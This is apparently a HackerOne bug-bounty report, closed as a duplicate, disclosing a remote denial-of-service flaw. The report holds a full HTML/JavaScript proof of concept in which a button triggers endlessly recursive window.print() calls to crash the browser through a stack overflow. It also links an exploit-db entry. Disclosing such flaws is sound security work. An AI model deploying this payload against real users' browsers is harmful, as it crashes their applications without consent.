Remote Stack Overflow Vulnerability (DoS)
Unknown
Vulnerability Details
Allows remote attackers to cause a denial of service (application crash) resulting in stack overflow via nested calls to the window.print javascript function.
<html>
<title>Remote Stack Overflow DoS PoC</title>
<body bgcolor="#50708C">
<center>
<p><font color="#e3e3e3">Remote Stack Overflow DoS PoC</font></p>
<button onClick=crash()>Execute!</button>
</center>
<script>
function crash(){
window.print();
crash();
}
</script>
</body>
</html>
Poc : Please find attached file POC Video
Reference Link : https://www.exploit-db.com/exploits/33951/
Actions
View on HackerOneReport Stats
- Report ID: 181061
- State: Closed
- Substate: duplicate
- Upvotes: 1